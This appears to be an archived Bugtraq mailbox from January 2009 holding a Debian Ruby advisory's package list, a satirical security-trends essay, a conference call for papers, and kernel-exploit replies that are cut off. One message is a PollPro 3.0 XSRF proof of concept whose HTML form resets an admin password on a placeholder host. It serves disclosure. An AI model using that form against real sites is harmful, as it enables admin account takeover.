    Size/MD5 checksum:   777146 a01b49460afc4733cff7d1da5c3892ca
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   219458 02100fb307634e08fd304f830fa73115
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   372960 2e69a084e4ecc663d54a885b69cd4d87
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   199768 14727fe59c8a774dc0ce5283bbe3adf4
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   218562 6ef5bfa416e85714847e7911ad15b7bc
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   294044 404be1b8ba5d7b1de693949bf7509c50
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   237306 abd5d03c1a8c5e730fbbb3b7cbfc13a3
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   217678 56fc7c04ec11e80b958592b53698f2cb
  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb
    Size/MD5 checksum:   312482 489f3cd6e21ef98d9b3d4031313e0ff8
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   199536 1a549205c85f26df75918ee1f5c5a5e6
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:  1107170 e3be222facad68b2ea2c1d743bfe7729
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   200076 a9030c3b873cf7feca45d7fb18b2c1c5
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:  1837356 f519218b7727c4c0064d87052a32cd57
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:   719018 ff1d0ace8eeec5d602e0cc94c3b834ae
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb
    Size/MD5 checksum:  1592732 37cfd2a2da9ab0c297cd3e3e2d44d9b0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   327762 27db76dd87740f49cf998c08d7ab567c
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:  1855938 622f315ff7c5c3e488b364102dff54bd
  http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   217518 c56bb0699f151595c7cea6cc0d002476
  http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   217572 74f4d455673a8cedbbd19f03cd1a68bf
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   779594 1da6fea9a757a6147bccd1be029efc77
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   884422 dd7a11cbdee41fc9efbfeb616236c261
  http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:  1849714 09fcada1e82f4f89b7cff7bb556ac055
  http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   235540 3431f6c302e74a70f0e31b13ee703c19
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:  1052398 95816bfd6638c6c6cf7c8c91f8a5a6df
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   305308 1123e31b1920e3e7f1ac216eddaaba37
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:  1838936 4accc47fcb960eaa9b04a6ff450c678b
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   218044 d92f877014b653c14260db06cfa0844e
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   199000 3c6e11cc181a6593505e20279d310a03
  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   198678 9b90584a77a43162a15087943f9596be
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:   199480 65c1e5b6224a9a5ed5f1afe4053e9e97
  http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   218054 147f93ceaf0c8119ca264957ffc7c51a
  http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb
    Size/MD5 checksum:   371520 61de55d36d7fadd6f885a4021bebc229
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb
    Size/MD5 checksum:  1620382 7a7339edea525e5d5bc6f8c794a8c3e7

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   197218 5ddc1259eef42b0c05439cb8ab731942
  http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   197994 3ab96c368edc3bce77e73b529c4c5b84
  http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:  1833286 c7f9f992093cacfb766259e889de13ba
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   960816 c43630f6bbb40fb21fffdc0ad516ddfe
  http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   197944 2d534c9e73f36b3b75e01f2f20bfb6c6
  http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   296102 c192762dbeaf435d11e51448565bc9b1
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   741330 59352ae48a97d10d96d23f84f8e3d4d7
  http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:  1543188 313ab5a0048823ce919bf50a1b3f1de9
  http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb
    Size/MD5 checksum:   217960 208c79695f22f705f70ecce79efa87b4


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJXor9AAoJEL97/wQC1SS+oOwIAJVvDM8u5mJ/kqi0l2SHkut5
mrOthgaOi5PIT2vTo+GPil85zLZqYkNxRZDMO0CrNbO6cLk+Mk2DtseXm9oP38JU
AbjaKkQzl7hUTiCDhHVe3ha45jh5++GOtpoyU7KRCpgjft3guz2U/D/y8KZ+uiMr
9cZs5GSYWZGW7B8MfwtguJ0jJGMQLUO5UwShFWpXPm38A11eM6hwGgNM5F6BRJbD
UeCeSKL7NQLxKl43KQW2vHIzFFhNfbmRF9PdP73V/JP8k32e2jLTzVjmy/VuZL+l
8BWhJRB/+QFyT47dYq13kAK7tiWwcPhkws8AdcoHY4nd86rl6dcaCpzOhmkhCrw=cx0C
-----END PGP SIGNATURE-----

From - Sat Jan  3 13:50:41 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000562f
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39057-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1D24DED7C5
for <lists@securityspace.com>; Sat,  3 Jan 2009 13:49:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1B3EA2370F3; Sat,  3 Jan 2009 11:16:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8310 invoked from network); 3 Jan 2009 15:33:39 -0000
Date: Sat, 3 Jan 2009 08:37:50 -0700
Message-Id: <200901031537.n03Fboie015791@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: joris@infogroep.be
To: bugtraq@securityfocus.com
Subject: Re: Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of
 service exploit
Status:   

you can add 2.6.26 to the list (or at least the gentoo version)

From - Mon Jan  5 10:40:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005638
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39058-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 64604EC0BC
for <lists@securityspace.com>; Mon,  5 Jan 2009 10:36:25 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0FF0E236F8E; Mon,  5 Jan 2009 08:18:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14918 invoked from network); 3 Jan 2009 18:55:11 -0000
X-pair-Authenticated: 83.44.154.76
Message-ID: <495FB9BD.2020308@isecom.org>
Date: Sat, 03 Jan 2009 20:17:17 +0100
From: Pete Herzog <lists@isecom.org>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080421 Lightning/0.8 Thunderbird/2.0.0.14 Mnenhy/0.7.5.666
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Top 5-ish Threats to Watch for in 2009
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Status:   

Hi,

For those of you not subscribed to the ISECOM News list, I sent this
out yesterday. Maybe it will give you a laugh. :)


----------------------------------------------------------------------
Top 5-ish Threats to Watch for in 2009

1. This continuing trend to invest in the constant reminders of
assumed security best practices screamed at all levels and types of
workers across the work site will continue to eat away budgets,
prevent security professionals from actually enhancing security and
distract employees from working. This includes policy tidbits and
factoids for employees to see everywhere from posters in the bathroom
to mouse pad messages on their desks to screensaver quizzes they need
to answer prior to login.  Even organizations that eschew formal
security awareness for the more often seen "IT guy complaining about
security and stupid users to anyone who will listen" are also part of
this threat.  The security awareness threat will cause a loss of
productivity and cost of materials to businesses worldwide that will
most likely exceed the loss due to un-security-aware employee security
blunders. They'd be better off spending that time and money on user
controls, making security policies simpler so that they can be read by
normal people as a job contingent, enforcing accountability, and
formally certifying (pass a practical) employees who need to do secure
gate-keeping.


2. This year will continue the wonderful understanding of all the
how-to truths about security that other people post on their websites
and those will become part of the white papers, policies, classes,
documentation, and advice of all the other people who study security
through the search engine. Sorry, you may know it under its common
name, Best Practices. Yes, best practices are all those tidbits that
may or may not have worked for somebody else and now they too can be
yours without ever having to know why! Interestingly, while certain
"facts" about security have long been known, there are nearly no
sizable, formal studies which measure the best practices people are
encouraged or even mandated to apply. And if there is beauty in truth
than marvel at these gorgeous Best Practices:

    "Update your anti-virus every 8 hours"
    "Use a firewall in front of your network"
    "Lick the USB connector before inserting it"

Oh, and compliance is a collection of these best practices. Do what
everyone else says to do or be punished by your peers! Yay for the
capitalistic, democratic legal system! Less for more!


3. Can you tell how many flies are in your home by the number of dead
ones on your front doorstep?  If not then you're using the wrong
metrics.  Study from the masters- that's right, this new year more and
more people will learn metrics from anti-malware or intrusion
detection companies.  As security metrics steps away from being the
little helper in Risk Management to become a booming industry in
itself it needs to wear its big-boy pants (the ones that can hold the
fat wallet). So its status as a threat to business management,
procurement, security decision-making, and the bottom line has never
be higher. That means they want your money. Badly. That makes them a
the same type of nasty threat you can expect from any aggressive yet
savvy televangelist- listen too long and you might be writing them checks.

To be fair, the security industry is trying really hard to get good
metrics but proper metrics are also labor intensive, require counting,
and other types of math beyond the average, disinterested, and
disillusioned security employee. Yes, just as measuring time requires
being able to read a clock, good metrics currently requires reading
security and controls. Watch for more digital watch equivalents in
2009. Unfortunately, like digital watches, it still assure people get
there on time.


4. The vuln hunters are getting more and more afraid of the legal
aspect of their jobs and are neutering their releases more and more
that by 2010 "Full Disclosure" will be about as revealing as a hole
filled with dirt.  But the announcements will be juicier, more
enticing, and more exaggerated getting bigger headlines and bigger
sky-is-falling dance floor time. This of course will cause many people
who are neither lazy nor good security analysts a great deal of stress
and wasted resources reacting to the announcement. Maybe we'll see a
genius console game like "Disclosure Disco Revolution" where huge bug
headlines pop up and you have to tap dance around them while at the
same time stamping out bugs (so contact me for licensing arrangements).


5. Guess what you call a security professional who graduated at the
bottom of their class and with the bare minimum of security trivia
memorized for their professional certification?  A CERTIFIED SECURITY
PROFESSIONAL!! Ha ha? LOL? *ahem* Okay, well, this new year will usher
in a new batch of people who graduate from college as security
experts. Yes, with as little as 4 years of college experience, even
the English major can be a security professional just by memorizing
security stuff! This is STILL happening! And people are STILL buying
into it. But it's better than nothing, you say? Really? Seriously? In
the old days we had to know systems blindfolded and in the rain and
had to get our fingers filthy on keyboard grease before we even began
to get an idea of how to DO it right-- not KNOW it right*.

Not to get all crotchety-old-guy on ya, let me just say that we can
expect that in 2009 there will be more of the same-- people who don't
know what they're doing certified as professionals for what they know.
Sure, you might think this is good for people who work in fields that
require only security knowledge, like law, writing policies or white
papers, or blogging security gotchas for the masses but then maybe
that's just buyer's remorse kickin in. No. Trivia, security or
otherwise, is okay for Game Shows and Reality TV but not for any kind
of security practice. It's not okay that your doctor only read the
medical textbooks. It's not okay that your legislation-drafter only
read about security. But this won't change. It'll get worse. Know why?
Because the people who write the legislation are already legislating
even more of their ilk get hired. Yay for the status quo!

* "right" in this case refers to a collection of experienced-based
best practices backed by anecdotal evidence and the statistics of
small numbers which still may or may not make sense but worked in that
specific implementation.


5-ish part 1: We will continue to see the increased production of
websites and new web platforms that increase the speed and flexibility
to which organizations can communicate effectively with the world,
supporting products, creating communities, and delivering support
notices amid marketing propaganda. Then when we contact them for
support they will quickly and effectively send us a generic email
telling us to call them according to their inconvenient times in their
distant timezone. This growing trend to move support to a
quasi-unmonitored support channel will cost those organizations in
returns, future sales, and distribution channels. And it will cost
their customers in lost time, phone bills, and stress-related health care.


5-ish part 2: We will see that people still race around patching their
computers whenever the latest security flaw is found. Seriously? As
this practice continues I feel like I'm visiting the security
equivalent of Amish country. I think there will be more people in 2009
who don't install service packs, patch services, or use fancy
patch-management software because they white-list proper connectivity
and actually configure their systems and design their networks for
their intended use according to their environments. The witness
protection model** is out and the prisoner model is in. Then again,
maybe we'll see the rise of the Patch Management Professional.

** WPM works as long as the user follows the rules and there are no
anomalies where as the PM is designed to anticipate the user is as
hostile as those whom the prisoner may interact with.


5-ish part 3: We will also need to worry more this year about an
increase of cyber "warfare" only because the Internet is really just a
road where there are no guard rails, licensed drivers, or inspected
vehicles and a whole lot of road rage. So any citizen of any country
can launch an international attack against the government of their
choice and incite an international incident. Sure, their country will
say, "They no work for us" (yes even the natively English speaking
ones will talk like that) and why should anyone believe them? This
worry will spawn a studio-backed movie by October 2009 and there will
be a close-up of Metasploit on a PDA and the voluptuous, accented
heroine will say words like "cantenna", "OSSTMM", and "Backtrack"
which will set the blogger world in a tizzy. (The tizzy coming from
people thinking she misspoke "awstim" for "awesome" and wondering what
she meant by following the AWESOME methodology. And I will cry.)


Bonus - the "Black Swan"

Here's the one that will pop out and take us all by surprise and
amassing massive casualties: Obama will call to ask me my opinion
about security improvements for the U.S. and I will tell him the
"Terrible Truth" as it applies to America. Then, as the Germans say,
is "schluss mit lustig". 2009 will become the year of the security
industry bail-out-- a cool trillion will go to feed security
awareness, antivirus and patch management hawksters as well as all the
others latched into the industry to re-invent themselves. And Firewall
people, remember when I promised to kill you last. I lied.


----------------------------------------------------------------------


Now quit shaking your head and actually laugh will ya?! Some of this
may actually be sarcastic and in no way represents my views, the views
of my organization, or the future of our children. Satire is still
protected in many countries. I'll avoid the others.

Or maybe I speak the truth?

Happy 2009 to you all!

Sincerely,
-pete.

-- 
Pete Herzog - Managing Director - pete@isecom.org
ISECOM - Institute for Security and Open Methodologies
www.isecom.org - www.osstmm.org
www.hackerhighschool.org - www.isestorm.org

From - Mon Jan  5 10:50:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005639
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39059-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 043CAEC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 10:47:49 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2DF7B237041; Mon,  5 Jan 2009 08:19:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17990 invoked from network); 3 Jan 2009 21:41:08 -0000
Date: 3 Jan 2009 22:02:59 -0000
Message-ID: <20090103220259.10990.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: b4DchiLd@msn.Com
To: bugtraq@securityfocus.com
Subject: PollPro 3.0 XSRF VuLn.
Status:   

< ------------------- header data start ------------------- >

#############################################################

# Application Name     : PollPro

# Vulnerable Type     : XSRF

# Infection          : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice     : Form&#8217;a Oturum Key&#8217;i (Session Token) eklenmeli, eski &#351;ifre sorulmal&#305;d&#305;r.

# author          : The_0nur-n0x

#############################################################

< ------------------- header data end of ------------------- >
<tr>
<th0x>
        <td>
          <br />
          <form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID" name="frm" method="post" onSubmit="return Th30nur()">
                <table cellpadding="2" cellspacing="0" border="0" align="center"><tr>
                 <td>Username:</td>
                 <td><input style="width: 400px;" type="Text" disabled="disabled" name="username" value="admin" size="45" maxlength="25" class="textbox" /></td>
                </tr><tr>
                 <td>Password:</td>
                 <td><input style="width: 400px;" type="Password" name="password" size="45" value="admin" maxlength="25" class="textbox" /></td>
                </tr><tr>
                 <td>Name:</td>
                 <td><input style="width: 400px;" type="Text" name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td>
                </tr><tr>
                 <td>Enabled:</td>
                 <td><input type="Checkbox" name="enable" checked value="1" /></td>
                </tr><tr>
                 <td colspan="2" align="right"><br /><input type="Submit" value="Update" /></td>
                </tr></table>
                <input type="Hidden" name="mode" value="edit" />
          </form>
          <br />
        </td>
    </tr></table></th0x>

From - Mon Jan  5 11:00:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000563a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39066-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 0D86DEC0BC
for <lists@securityspace.com>; Mon,  5 Jan 2009 10:51:55 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 4AE62143AD1; Mon,  5 Jan 2009 08:33:33 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14196 invoked from network); 4 Jan 2009 21:50:10 -0000
X-Virus-Scanned: amavisd-new at elet.polimi.it
Message-ID: <49613435.9030709@securenetwork.it>
Date: Sun, 04 Jan 2009 23:12:05 +0100
From: Stefano Zanero <s.zanero@securenetwork.it>
Organization: Secure Network S.r.l.
User-Agent: Thunderbird 2.0.0.19 (X11/20090103)
MIME-Version: 1.0
To: Bugtraq <bugtraq@securityfocus.com>
Subject: Call for papers and trainers - SeacureIT 2009
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

Dear colleagues,

it is my pleasure to officially announce the launch of SEaCURE.IT, the
first international technical conference ever held in Italy on security
releated topics (http://www.seacure.it).

The 2009 edition will be held from May 19th to 22nd in the wonderful
seaside resort Tanka Village, located in Villasimius, Sardinia, a large
and beautiful island in the Mediterranean sea.

Besides the main conference, featuring two tracks of top-notch
presentations over two intense days, the programme will include two days
of advanced trainings, and a set of unique social events (Italian
style), in order to foster networking.

A number of key speakers already confirmed their presence, and we warmly
thank them for the trust placed in us. With this call for papers, we
invite submission of papers from researchers worldwide for presentation
at our conference.

== About SEaCURE.it =
SEaCURE.IT is the first international technical conference ever held in
Italy on security releated topics, aimed at bringing together the
leading experts from all over the world, to create a unique setting for
networking and discussion among the speakers and the attendees.

The 2009 edition will be held from May 19th to 22nd in the wonderful
seaside resort Tanka Village, located in Villasimius. In a relaxed
setting, our attendees and speakers will be able to meet and discuss in
an informal, highly profitable way.

Besides the main conference, featuring two tracks of top-notch
presentations over two intense days, the programme includes two days of
advanced trainings, and a set of unique social events (Italian style),
in order to foster networking.
SeacureIT is a non-vendor biased conference, strongly believing that it
is possible to put together the brightest minds from the university,
goverment, industry and hacking community to provide the audience with
cutting-edge research in the field.
Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall-Admins, and Software Developers.

== Speakers/Trainers =
Until February 10th, 23:59 CET, we'll be accepting speech proposals.
Please note we are a non-product, non-vendor biased security conference,
and do not accept vendor pitches. Any talk evidently aimed at selling
products or services will be rejected without consideration. We look for
novel research and contributions in the fields of computer, network and
information security. Please, submit your idea to us: we will carefully
evaluate it. We will also evaluate proposals for 2-days technical
trainings on the same topics.

We offer the following speaker privileges:
    * * One economy class return-ticket to Cagliari for each accepted
presentation.
    * * 3 nights of accomodation in the Conference Hotel.
    * * Meals for the speakers, and speaker activities during, before,
and after the conference.
    * * A comprehensive program of activities for non-geek partners :)
    * * Speaker party

We offer the following trainer privileges:
    * * 50% of the net profit of the class
    * * 3 nights of accomodation in the Conference Hotel
    * * Meals during the days of the training
    * * Free access to the Conference
    * * Participation to speaker activities

== Topics =
We are interested in bleeding edge security research, directly from
leading researchers, professionals in academics, industry, and
government, and the underground security community. Topics of special
interest include, but are not limited to:

    * * Vista, Linux, OSX Security
    * * E/I-Voting Case-Studies, Attacks, Weaknesses
    * * Mobile Security
    * * Network Protocol Analysis
    * * AJAX/Web2.0/Javascript Security
    * * Secure Software Development
    * * VoIP
    * * Perimeter Defense / Firewall Technology
    * * Digital Forensics
    * * WLAN/WiFi, GPRS, IPv6 and 3G Security
    * * IPv6
    * * Smart Card Security
    * * Cryptography
    * * Intrusion Detection
    * * Incident Response
    * * Rootkit Detection, Techniques, and Defense
    * * Security Properties of Web-Frameworks
    * * Malicious Code Analysis
    * * Secure Framework Design
    * * .Net and Java Security

== Submissions =
Please send your submission to cfp@seacure.it with the following
information IN PLAIN TEXT in your email:

   1. Presenter name and affiliation
   2. Country and city of origin for your travel to the conference, as
well as nationality/passport for visa requirements
   4. contact information (e-mail address and a landline phone if possible)
   5. SHORT biography, and a list of SELECTED publications and papers
   6. Proposed paper title / proposed training title
   7. Proposed paper abstract / proposed training outline
   8. Three key reasons why you want to speak at SEaCURE.IT and why we
would want you to speak :)
   9. Optionally, any samples of prepared material or outlines (for
this, a pdf attachment is acceptable)
  10. Please list any other publications or conferences where this
material has been or will be published/submitted. Concurrent submission
is not a reason for rejection, while un-announced multiple submissions
will make you look considerably bad ;-)
This last point also applies for the trainings, please let us know how
many times the training has been delivered and where.

Regards,
Stefano Zanero

From - Mon Jan  5 11:10:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000563b
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39060-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F3173EC0BB
for <lists@securityspace.com>; Mon,  5 Jan 2009 11:03:07 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C3041237221; Mon,  5 Jan 2009 08:19:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21690 invoked from network); 4 Jan 2009 00:50:30 -0000
Message-ID: <28fa9c5e0901031712j1f53fac9r136b08d618fb10d4@mail.gmail.com>
Date: Sun, 4 Jan 2009 09:12:21 +0800
From: "Eugene Teo" <eugeneteo@kernel.sg>
To: i9p@hotmail.fr
Subject: Re: Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit
Cc: bugtraq@securityfocus.com
In-Reply-To: <20090101161517.17759.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <20090101161517.17759.qmail@securityfocus.com>
Status:   

On Fri, Jan 2, 2009 at 12:15 AM,  <i9p@hotmail.fr> wrote:
> /*
> Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit
>
> Author : Adurit Team
